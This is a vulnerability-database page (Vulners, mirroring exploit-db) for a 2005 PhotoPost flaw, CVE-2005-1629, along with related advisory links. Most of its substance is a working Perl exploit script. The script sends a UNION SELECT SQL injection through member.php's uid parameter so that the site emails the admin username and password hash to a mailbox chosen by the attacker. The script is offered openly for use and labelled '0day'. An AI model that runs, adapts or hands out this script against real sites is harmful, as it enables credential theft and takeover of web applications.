Lucene search
+L

PhotoPost - Arbitrary Data Hash

🗓️ 13 May 2005 00:00:00Reported by basher13Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Exploit for PhotoPost retrieves admin MD5 hash and username sent via email.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
PhotoPost Multiple Vulnerabilities
10 Mar 200500:00
nessus
nessus
Tenable Nessus
PhotoPost PHP Pro < 5.02 RC4 member.php uid Parameter SQL Injection
13 May 200500:00
nessus
nessus
Tenable Nessus
PhotoPost PHP < 5.0.1 Multiple Remote Vulnerabilities
11 Mar 200500:00
nessus
cve
CVE
CVE-2005-1629
17 May 200504:00
cve
cvelist
Cvelist
CVE-2005-1629
17 May 200504:00
cvelist
euvd
EUVD
EUVD-2005-1632
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-1629
17 May 200504:00
nvd
redhatcve
RedhatCVE
CVE-2005-1629
9 Jan 202612:46
redhatcve
#!/usr/bin/perl
# PhotoPost Arbitrary Data Exploit
# --------------------------------
# INFPG - Hacking&Security Research
#
#
# Use first the exploit code,then You'll get admin MD5 hash and user name on your mail.
#
# Greats: Infam0us Gr0up team/crew/fans,Zone-H,securiteam,str0ke-milw0rm,addict3d,
# Thomas-secunia,Yudha,Dcrab's,Kavling Community,1st Indonesian Security,
# Jasakom,ECHO,etc..betst reagrds t0 whell.
# Info: www.98.to/infamous
#

use IO::Socket;

if (@ARGV < 3)
{
system "clear";
print "PhotoPost Arbitrary Data Exploit\n";
print "\n-------------------------------\n";
print "\nINFGP-Hacking&Security Research\n";
print "\n\n";
print "[?]Usage: perl $0 [host] [path] [mail] \n";
exit(1);
}

system "clear";

$server = $ARGV[0];
$folder = @ARGV[1];
$mail = @ARGV[2];

print "Connecting to host ...\n";
$socket = IO::Socket::INET->new(
       Proto => "tcp",
       PeerAddr => "$ARGV[0]",
       PeerPort => "80"); unless ($socket)
{
 die "Server is offline\n"
}

print "[+]Connected\n\n";
print "[+]Building string core..\n";

$stringcore = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0",$mail
,%20concat(username,"%20",%20password)%20from%20users';

print "Sent 0day..\n\n";
print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n";
print "Server Exploited\n";
print "You should check $mail now";
close($socket);

# milw0rm.com [2005-05-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02089
33